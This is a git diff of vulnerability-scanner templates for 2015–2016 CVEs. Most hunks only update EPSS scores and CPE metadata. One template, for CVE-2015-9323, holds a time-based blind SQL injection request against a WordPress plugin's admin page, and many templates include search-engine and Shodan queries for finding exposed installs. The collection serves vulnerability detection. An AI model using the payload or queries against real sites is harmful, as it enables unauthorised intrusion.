cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:*
+ epss-percentile: 0.90091
metadata:
max-request: 1
vendor: xceedium
diff --git a/http/cves/2015/CVE-2015-4668.yaml b/http/cves/2015/CVE-2015-4668.yaml
index 7d067dba7d..29ed7b75f7 100644
--- a/http/cves/2015/CVE-2015-4668.yaml
+++ b/http/cves/2015/CVE-2015-4668.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-601
epss-score: 0.00397
cpe: cpe:2.3:a:xceedium:xsuite:2.3.0:*:*:*:*:*:*:*
+ epss-percentile: 0.70183
metadata:
max-request: 1
vendor: xceedium
diff --git a/http/cves/2015/CVE-2015-4694.yaml b/http/cves/2015/CVE-2015-4694.yaml
index 51c99a77e6..ffbd2aa17b 100644
--- a/http/cves/2015/CVE-2015-4694.yaml
+++ b/http/cves/2015/CVE-2015-4694.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 8.6
cve-id: CVE-2015-4694
cwe-id: CWE-22
- epss-score: 0.01382
+ epss-score: 0.02304
cpe: cpe:2.3:a:zip_attachments_project:zip_attachments:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.88284
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/zip-attachments"
diff --git a/http/cves/2015/CVE-2015-5354.yaml b/http/cves/2015/CVE-2015-5354.yaml
index 741931920d..0ca88f2a54 100644
--- a/http/cves/2015/CVE-2015-5354.yaml
+++ b/http/cves/2015/CVE-2015-5354.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-601
epss-score: 0.00166
cpe: cpe:2.3:a:novius-os:novius_os:5.0.1:*:*:*:*:*:*:*
+ epss-percentile: 0.52595
metadata:
max-request: 1
vendor: novius-os
diff --git a/http/cves/2015/CVE-2015-5461.yaml b/http/cves/2015/CVE-2015-5461.yaml
index 1170f49ccf..03c5ea65e5 100644
--- a/http/cves/2015/CVE-2015-5461.yaml
+++ b/http/cves/2015/CVE-2015-5461.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: NVD-CWE-Other
epss-score: 0.0055
cpe: cpe:2.3:a:stageshow_project:stageshow:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.74565
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/stageshow/"
diff --git a/http/cves/2015/CVE-2015-5469.yaml b/http/cves/2015/CVE-2015-5469.yaml
index bb26a89b34..f336b3ef93 100644
--- a/http/cves/2015/CVE-2015-5469.yaml
+++ b/http/cves/2015/CVE-2015-5469.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.02176
cpe: cpe:2.3:a:mdc_youtube_downloader_project:mdc_youtube_downloader:2.1.0:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.87946
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2015/CVE-2015-5471.yaml b/http/cves/2015/CVE-2015-5471.yaml
index 31a794faa6..1145f32d6a 100644
--- a/http/cves/2015/CVE-2015-5471.yaml
+++ b/http/cves/2015/CVE-2015-5471.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 5.3
cve-id: CVE-2015-5471
cwe-id: CWE-22
- epss-score: 0.1035
+ epss-score: 0.11139
cpe: cpe:2.3:a:swim_team_project:swim_team:1.44.10777:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.94418
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/wp-swimteam"
diff --git a/http/cves/2015/CVE-2015-5531.yaml b/http/cves/2015/CVE-2015-5531.yaml
index a348a4d5cc..a945219cb8 100644
--- a/http/cves/2015/CVE-2015-5531.yaml
+++ b/http/cves/2015/CVE-2015-5531.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.97074
cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99659
metadata:
max-request: 3
vendor: elasticsearch
diff --git a/http/cves/2015/CVE-2015-5688.yaml b/http/cves/2015/CVE-2015-5688.yaml
index bf5ca44f41..b9503c8ba7 100644
--- a/http/cves/2015/CVE-2015-5688.yaml
+++ b/http/cves/2015/CVE-2015-5688.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-22
epss-score: 0.01347
cpe: cpe:2.3:a:geddyjs:geddy:13.0.7:*:*:*:*:node.js:*:*
+ epss-percentile: 0.84447
metadata:
max-request: 1
framework: node.js
diff --git a/http/cves/2015/CVE-2015-6477.yaml b/http/cves/2015/CVE-2015-6477.yaml
index 065d615e02..f07fa8bb69 100644
--- a/http/cves/2015/CVE-2015-6477.yaml
+++ b/http/cves/2015/CVE-2015-6477.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 4.3
cve-id: CVE-2015-6477
cwe-id: CWE-79
- epss-score: 0.00357
+ epss-score: 0.00294
cpe: cpe:2.3:o:nordex:nordex_control_2_scada:*:*:*:*:*:*:*:*
+ epss-percentile: 0.65327
metadata:
max-request: 1
vendor: nordex
diff --git a/http/cves/2015/CVE-2015-6544.yaml b/http/cves/2015/CVE-2015-6544.yaml
index 1261c787aa..73c473aa05 100644
--- a/http/cves/2015/CVE-2015-6544.yaml
+++ b/http/cves/2015/CVE-2015-6544.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00284
cpe: cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:*
+ epss-percentile: 0.64643
metadata:
max-request: 1
vendor: combodo
diff --git a/http/cves/2015/CVE-2015-6920.yaml b/http/cves/2015/CVE-2015-6920.yaml
index a2692810fd..4fd826dca3 100644
--- a/http/cves/2015/CVE-2015-6920.yaml
+++ b/http/cves/2015/CVE-2015-6920.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.0016
cpe: cpe:2.3:a:sourceafrica_project:sourceafrica:0.1.3:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.52033
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2015/CVE-2015-7245.yaml b/http/cves/2015/CVE-2015-7245.yaml
index dadc000d42..7cd96cac24 100644
--- a/http/cves/2015/CVE-2015-7245.yaml
+++ b/http/cves/2015/CVE-2015-7245.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.96881
cpe: cpe:2.3:o:d-link:dvg-n5402sp_firmware:w1000cn-00:*:*:*:*:*:*:*
+ epss-percentile: 0.99575
metadata:
max-request: 1
vendor: d-link
diff --git a/http/cves/2015/CVE-2015-7297.yaml b/http/cves/2015/CVE-2015-7297.yaml
index 74a7eda1cf..db3fc64fdd 100644
--- a/http/cves/2015/CVE-2015-7297.yaml
+++ b/http/cves/2015/CVE-2015-7297.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-89
epss-score: 0.97564
cpe: cpe:2.3:a:joomla:joomla\!:3.2.0:*:*:*:*:*:*:*
+ epss-percentile: 0.99996
metadata:
max-request: 1
vendor: joomla
diff --git a/http/cves/2015/CVE-2015-7377.yaml b/http/cves/2015/CVE-2015-7377.yaml
index 38ba59a2fc..128bbac596 100644
--- a/http/cves/2015/CVE-2015-7377.yaml
+++ b/http/cves/2015/CVE-2015-7377.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00239
cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.61218
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2015/CVE-2015-7450.yaml b/http/cves/2015/CVE-2015-7450.yaml
index e0915a593a..bc655c06fd 100644
--- a/http/cves/2015/CVE-2015-7450.yaml
+++ b/http/cves/2015/CVE-2015-7450.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2015-7450
cwe-id: CWE-94
- epss-score: 0.97411
+ epss-score: 0.9741
cpe: cpe:2.3:a:ibm:tivoli_common_reporting:2.1:*:*:*:*:*:*:*
+ epss-percentile: 0.99883
metadata:
max-request: 1
shodan-query: http.html:"IBM WebSphere Portal"
diff --git a/http/cves/2015/CVE-2015-7780.yaml b/http/cves/2015/CVE-2015-7780.yaml
index adb50e8858..d0eb497ded 100644
--- a/http/cves/2015/CVE-2015-7780.yaml
+++ b/http/cves/2015/CVE-2015-7780.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-22
epss-score: 0.00151
cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:*
+ epss-percentile: 0.50657
metadata:
max-request: 1
vendor: zohocorp
diff --git a/http/cves/2015/CVE-2015-7823.yaml b/http/cves/2015/CVE-2015-7823.yaml
index 6ebbc77776..d14efbf129 100644
--- a/http/cves/2015/CVE-2015-7823.yaml
+++ b/http/cves/2015/CVE-2015-7823.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: NVD-CWE-Other
epss-score: 0.00233
cpe: cpe:2.3:a:kentico:kentico_cms:8.2:*:*:*:*:*:*:*
+ epss-percentile: 0.60673
metadata:
max-request: 1
vendor: kentico
diff --git a/http/cves/2015/CVE-2015-8349.yaml b/http/cves/2015/CVE-2015-8349.yaml
index c09e5962d7..ac4caccc5b 100644
--- a/http/cves/2015/CVE-2015-8349.yaml
+++ b/http/cves/2015/CVE-2015-8349.yaml
@@ -13,8 +13,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2015-8349
cwe-id: CWE-79
- epss-score: 0.00127
+ epss-score: 0.0013
cpe: cpe:2.3:a:gameconnect:sourcebans:*:*:*:*:*:*:*:*
+ epss-percentile: 0.47144
metadata:
max-request: 1
vendor: gameconnect
diff --git a/http/cves/2015/CVE-2015-8399.yaml b/http/cves/2015/CVE-2015-8399.yaml
index b85cb15a2f..a030973153 100644
--- a/http/cves/2015/CVE-2015-8399.yaml
+++ b/http/cves/2015/CVE-2015-8399.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-200
epss-score: 0.9647
cpe: cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99388
metadata:
max-request: 1
shodan-query: http.component:"Atlassian Confluence"
diff --git a/http/cves/2015/CVE-2015-8813.yaml b/http/cves/2015/CVE-2015-8813.yaml
index 482af0b3c6..cf82566970 100644
--- a/http/cves/2015/CVE-2015-8813.yaml
+++ b/http/cves/2015/CVE-2015-8813.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-918
epss-score: 0.00511
cpe: cpe:2.3:a:umbraco:umbraco:*:*:*:*:*:*:*:*
+ epss-percentile: 0.73635
metadata:
max-request: 1
vendor: umbraco
diff --git a/http/cves/2015/CVE-2015-9312.yaml b/http/cves/2015/CVE-2015-9312.yaml
index 41008b0b18..793ea8da08 100644
--- a/http/cves/2015/CVE-2015-9312.yaml
+++ b/http/cves/2015/CVE-2015-9312.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00088
cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.36469
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2015/CVE-2015-9323.yaml b/http/cves/2015/CVE-2015-9323.yaml
index 0c7fe40371..78d1d5130e 100644
--- a/http/cves/2015/CVE-2015-9323.yaml
+++ b/http/cves/2015/CVE-2015-9323.yaml
@@ -5,18 +5,26 @@ info:
author: Harsh
severity: critical
description: |
- The 404 to 301 – Redirect, Log and Notify 404 Errors WordPress plugin was affected by an Authenticated Blind SQL Injection security vulnerability.
- remediation: Fixed in version 2.0.3
+ The 404 to 301 – Redirect, Log and Notify 404 Errors WordPress plugin was affected by an Authenticated Blind SQL Injection security vulnerability.
reference:
- https://wpscan.com/vulnerability/61586816-dd2b-461d-975f-1989502affd9
- http://cinu.pl/research/wp-plugins/mail_e28f19a8f03f0517f94cb9fea15d8525.html
+ - https://wordpress.org/plugins/404-to-301/#developers
+ remediation: Fixed in version 2.0.3
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
+ cve-id: CVE-2015-9323
cwe-id: CWE-89
+ epss-score: 0.00784
+ cpe: cpe:2.3:a:duckdev:404_to_301:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.79207
metadata:
verified: true
max-request: 2
+ framework: wordpress
+ vendor: duckdev
+ product: 404_to_301
tags: cve,cve2015,404-to-301,sqli,wpscan,wp-plugin,wp,wordpress,authenticated
http:
@@ -27,7 +35,6 @@ http:
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
-
- |
@timeout: 15s
GET /wp-admin/admin.php?page=i4t3-logs&orderby=(SELECT+*+FROM+(SELECT+SLEEP(5))XXX)--+- HTTP/1.1
diff --git a/http/cves/2015/CVE-2015-9414.yaml b/http/cves/2015/CVE-2015-9414.yaml
index ee33cc0eea..a5cf4727a8 100644
--- a/http/cves/2015/CVE-2015-9414.yaml
+++ b/http/cves/2015/CVE-2015-9414.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00111
cpe: cpe:2.3:a:wpsymposiumpro:wp-symposium:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.43615
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/wp-symposium"
diff --git a/http/cves/2015/CVE-2015-9480.yaml b/http/cves/2015/CVE-2015-9480.yaml
index 08a5002865..586c0d752c 100644
--- a/http/cves/2015/CVE-2015-9480.yaml
+++ b/http/cves/2015/CVE-2015-9480.yaml
@@ -13,8 +13,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2015-9480
cwe-id: CWE-22
- epss-score: 0.23765
+ epss-score: 0.25055
cpe: cpe:2.3:a:robot-cpa:robotcpa:5:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.9605
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/robotcpa"
diff --git a/http/cves/2016/CVE-2016-0957.yaml b/http/cves/2016/CVE-2016-0957.yaml
index 79066d1546..dae11fb9ae 100644
--- a/http/cves/2016/CVE-2016-0957.yaml
+++ b/http/cves/2016/CVE-2016-0957.yaml
@@ -15,6 +15,7 @@ info:
cve-id: CVE-2016-0957
epss-score: 0.06304
cpe: cpe:2.3:a:adobe:dispatcher:*:*:*:*:*:*:*:*
+ epss-percentile: 0.927
metadata:
max-request: 1
shodan-query: http.component:"Adobe Experience Manager"
diff --git a/http/cves/2016/CVE-2016-1000126.yaml b/http/cves/2016/CVE-2016-1000126.yaml
index 9c24a4852d..9de0fafabf 100644
--- a/http/cves/2016/CVE-2016-1000126.yaml
+++ b/http/cves/2016/CVE-2016-1000126.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00119
cpe: cpe:2.3:a:admin-font-editor_project:admin-font-editor:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.45183
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/admin-font-editor"
diff --git a/http/cves/2016/CVE-2016-1000127.yaml b/http/cves/2016/CVE-2016-1000127.yaml
index 44fbc48f3f..bd145b8e70 100644
--- a/http/cves/2016/CVE-2016-1000127.yaml
+++ b/http/cves/2016/CVE-2016-1000127.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00119
cpe: cpe:2.3:a:ajax-random-post_project:ajax-random-post:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.45183
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2016/CVE-2016-1000128.yaml b/http/cves/2016/CVE-2016-1000128.yaml
index 474d5fe824..2430d002e1 100644
--- a/http/cves/2016/CVE-2016-1000128.yaml
+++ b/http/cves/2016/CVE-2016-1000128.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.001
cpe: cpe:2.3:a:anti-plagiarism_project:anti-plagiarism:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.40571
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/anti-plagiarism"
diff --git a/http/cves/2016/CVE-2016-1000129.yaml b/http/cves/2016/CVE-2016-1000129.yaml
index 65dab23dea..fc1c42eecb 100644
--- a/http/cves/2016/CVE-2016-1000129.yaml
+++ b/http/cves/2016/CVE-2016-1000129.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00119
cpe: cpe:2.3:a:defa-online-image-protector_project:defa-online-image-protector:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.45183
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/defa-online-image-protector"
diff --git a/http/cves/2016/CVE-2016-1000130.yaml b/http/cves/2016/CVE-2016-1000130.yaml
index 461dee8a7a..94f64c28bd 100644
--- a/http/cves/2016/CVE-2016-1000130.yaml
+++ b/http/cves/2016/CVE-2016-1000130.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00093
cpe: cpe:2.3:a:e-search_project:e-search:1.0:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.38597
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/e-search"
diff --git a/http/cves/2016/CVE-2016-1000131.yaml b/http/cves/2016/CVE-2016-1000131.yaml
index 1b80c03b1a..b0c528563d 100644
--- a/http/cves/2016/CVE-2016-1000131.yaml
+++ b/http/cves/2016/CVE-2016-1000131.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.001
cpe: cpe:2.3:a:e-search_project:esearch:1.0:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.40571
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/e-search"
diff --git a/http/cves/2016/CVE-2016-1000132.yaml b/http/cves/2016/CVE-2016-1000132.yaml
index 6c01ed11c2..9f7a79031e 100644
--- a/http/cves/2016/CVE-2016-1000132.yaml
+++ b/http/cves/2016/CVE-2016-1000132.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00116
cpe: cpe:2.3:a:cminds:tooltip_glossary:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.44589
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/enhanced-tooltipglossary"
diff --git a/http/cves/2016/CVE-2016-1000133.yaml b/http/cves/2016/CVE-2016-1000133.yaml
index 2839c0fccf..4848d6b312 100644
--- a/http/cves/2016/CVE-2016-1000133.yaml
+++ b/http/cves/2016/CVE-2016-1000133.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00142
cpe: cpe:2.3:a:designsandcode:forget_about_shortcode_buttons:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.49194
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/forget-about-shortcode-buttons"
diff --git a/http/cves/2016/CVE-2016-1000134.yaml b/http/cves/2016/CVE-2016-1000134.yaml
index 023b296800..2a90f0f2f0 100644
--- a/http/cves/2016/CVE-2016-1000134.yaml
+++ b/http/cves/2016/CVE-2016-1000134.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.001
cpe: cpe:2.3:a:hdw-tube_project:hdw-tube:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.40571
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/hdw-tube"
diff --git a/http/cves/2016/CVE-2016-1000135.yaml b/http/cves/2016/CVE-2016-1000135.yaml
index 7bf2dc6517..8be4bd8da8 100644
--- a/http/cves/2016/CVE-2016-1000135.yaml
+++ b/http/cves/2016/CVE-2016-1000135.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.001
cpe: cpe:2.3:a:hdw-tube_project:hdw-tube:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.40571
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/hdw-tube"
diff --git a/http/cves/2016/CVE-2016-1000136.yaml b/http/cves/2016/CVE-2016-1000136.yaml
index ddf170e830..67dc5543d7 100644
--- a/http/cves/2016/CVE-2016-1000136.yaml
+++ b/http/cves/2016/CVE-2016-1000136.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00119
cpe: cpe:2.3:a:heat-trackr_project:heat-trackr:1.0:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.45183
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/heat-trackr"
diff --git a/http/cves/2016/CVE-2016-1000137.yaml b/http/cves/2016/CVE-2016-1000137.yaml
index f8ed55f4d4..72055e9cd6 100644
--- a/http/cves/2016/CVE-2016-1000137.yaml
+++ b/http/cves/2016/CVE-2016-1000137.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.001
cpe: cpe:2.3:a:hero-maps-pro_project:hero-maps-pro:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.40571
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2016/CVE-2016-1000138.yaml b/http/cves/2016/CVE-2016-1000138.yaml
index d63886fd31..48a4894702 100644
--- a/http/cves/2016/CVE-2016-1000138.yaml
+++ b/http/cves/2016/CVE-2016-1000138.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00119
cpe: cpe:2.3:a:indexisto_project:indexisto:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.45183
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/indexisto"
diff --git a/http/cves/2016/CVE-2016-1000139.yaml b/http/cves/2016/CVE-2016-1000139.yaml
index 5c9a04c0ac..4304fc656b 100644
--- a/http/cves/2016/CVE-2016-1000139.yaml
+++ b/http/cves/2016/CVE-2016-1000139.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00116
cpe: cpe:2.3:a:infusionsoft_project:infusionsoft:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.44589
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/infusionsoft"
diff --git a/http/cves/2016/CVE-2016-1000140.yaml b/http/cves/2016/CVE-2016-1000140.yaml
index f9b9ddbb8c..e9813e3aa2 100644
--- a/http/cves/2016/CVE-2016-1000140.yaml
+++ b/http/cves/2016/CVE-2016-1000140.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00119
cpe: cpe:2.3:a:new-year-firework_project:new-year-firework:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.45183
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2016/CVE-2016-1000141.yaml b/http/cves/2016/CVE-2016-1000141.yaml
index dcd7398dd7..68f595d84c 100644
--- a/http/cves/2016/CVE-2016-1000141.yaml
+++ b/http/cves/2016/CVE-2016-1000141.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00142
cpe: cpe:2.3:a:page-layout-builder_project:page-layout-builder:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.49194
metadata:
max-request: 1
google-query: inurl:"/wp-content/plugins/page-layout-builder"
diff --git a/http/cves/2016/CVE-2016-1000142.yaml b/http/cves/2016/CVE-2016-1000142.yaml
index fce3b936c2..fd00d420d1 100644
--- a/http/cves/2016/CVE-2016-1000142.yaml
+++ b/http/cves/2016/CVE-2016-1000142.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00103
cpe: cpe:2.3:a:parsi-font_project:parsi-font:4.2.5:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.4117
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2016/CVE-2016-1000143.yaml b/http/cves/2016/CVE-2016-1000143.yaml
index cb2e360636..d4cc16a8f6 100644
--- a/http/cves/2016/CVE-2016-1000143.yaml
+++ b/http/cves/2016/CVE-2016-1000143.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00142
cpe: cpe:2.3:a:photoxhibit_project:photoxhibit:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.49194
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2016/CVE-2016-1000146.yaml b/http/cves/2016/CVE-2016-1000146.yaml
index b7d716f5b8..525303ccda 100644
--- a/http/cves/2016/CVE-2016-1000146.yaml
+++ b/http/cves/2016/CVE-2016-1000146.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00119
cpe: cpe:2.3:a:pondol-formmail_project:pondol-formmail:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.45183
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2016/CVE-2016-1000148.yaml b/http/cves/2016/CVE-2016-1000148.yaml
index 4ec082eb05..f73450f9a7 100644
--- a/http/cves/2016/CVE-2016-1000148.yaml
+++ b/http/cves/2016/CVE-2016-1000148.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00119
cpe: cpe:2.3:a:s3-video_project:s3-video:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.45183
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2016/CVE-2016-1000149.yaml b/http/cves/2016/CVE-2016-1000149.yaml
index e4cd2c79db..57281ffc9e 100644
--- a/http/cves/2016/CVE-2016-1000149.yaml
+++ b/http/cves/2016/CVE-2016-1000149.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00119
cpe: cpe:2.3:a:simpel-reserveren_project:simpel-reserveren:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.45183
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2016/CVE-2016-1000152.yaml b/http/cves/2016/CVE-2016-1000152.yaml
index 75c9aeb247..0e587c7a02 100644
--- a/http/cves/2016/CVE-2016-1000152.yaml
+++ b/http/cves/2016/CVE-2016-1000152.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00249
cpe: cpe:2.3:a:tidio-form_project:tidio-form:1.0:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.6202
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2016/CVE-2016-1000153.yaml b/http/cves/2016/CVE-2016-1000153.yaml
index b9cb2155fb..2fde9593fc 100644
--- a/http/cves/2016/CVE-2016-1000153.yaml
+++ b/http/cves/2016/CVE-2016-1000153.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.001
cpe: cpe:2.3:a:tidio-gallery_project:tidio-gallery:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.40571
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2016/CVE-2016-1000154.yaml b/http/cves/2016/CVE-2016-1000154.yaml
index 69fc49e624..b264220cc0 100644
--- a/http/cves/2016/CVE-2016-1000154.yaml
+++ b/http/cves/2016/CVE-2016-1000154.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00142
cpe: cpe:2.3:a:browserweb:whizz:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.49194
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2016/CVE-2016-1000155.yaml b/http/cves/2016/CVE-2016-1000155.yaml
index aa6e5de965..340692278a 100644
--- a/http/cves/2016/CVE-2016-1000155.yaml
+++ b/http/cves/2016/CVE-2016-1000155.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00103
cpe: cpe:2.3:a:wpsolr:wpsolr-search-engine:7.6:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.4117
metadata:
max-request: 1
framework: wordpress
diff --git a/http/cves/2016/CVE-2016-10033.yaml b/http/cves/2016/CVE-2016-10033.yaml
index af008b59ce..7b6c19823d 100644
--- a/http/cves/2016/CVE-2016-10033.yaml
+++ b/http/cves/2016/CVE-2016-10033.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-77
epss-score: 0.97464
cpe: cpe:2.3:a:phpmailer_project:phpmailer:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99934
metadata:
max-request: 2
vendor: phpmailer_project
diff --git a/http/cves/2016/CVE-2016-10108.yaml b/http/cves/2016/CVE-2016-10108.yaml
index fbc793f0c0..c48c2608d1 100644
--- a/http/cves/2016/CVE-2016-10108.yaml
+++ b/http/cves/2016/CVE-2016-10108.yaml
@@ -10,19 +10,21 @@ info:
- https://web.archive.org/web/20170315123948/https://www.stevencampbell.info/2016/12/command-injection-in-western-digital-mycloud-nas/
- https://nvd.nist.gov/vuln/detail/CVE-2016-10108
- https://packetstormsecurity.com/files/173802/Western-Digital-MyCloud-Unauthenticated-Command-Injection.html
+ - http://packetstormsecurity.com/files/173802/Western-Digital-MyCloud-Unauthenticated-Command-Injection.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2016-10108
cwe-id: CWE-77
- epss-score: 0.01264
+ epss-score: 0.84853
cpe: cpe:2.3:a:western_digital:mycloud_nas:2.11.142:*:*:*:*:*:*:*
+ epss-percentile: 0.98057
metadata:
max-request: 1
shodan-query: http.favicon.hash:-1074357885
vendor: western_digital
product: mycloud_nas
- tags: cve,cve2016,rce,oast,wdcloud
+ tags: packetstorm,cve,cve2016,rce,oast,wdcloud
http:
- raw:
diff --git a/http/cves/2016/CVE-2016-10134.yaml b/http/cves/2016/CVE-2016-10134.yaml
index 7991fd0130..c667d31da8 100644
--- a/http/cves/2016/CVE-2016-10134.yaml
+++ b/http/cves/2016/CVE-2016-10134.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2016-10134
cwe-id: CWE-89
- epss-score: 0.05366
+ epss-score: 0.46819
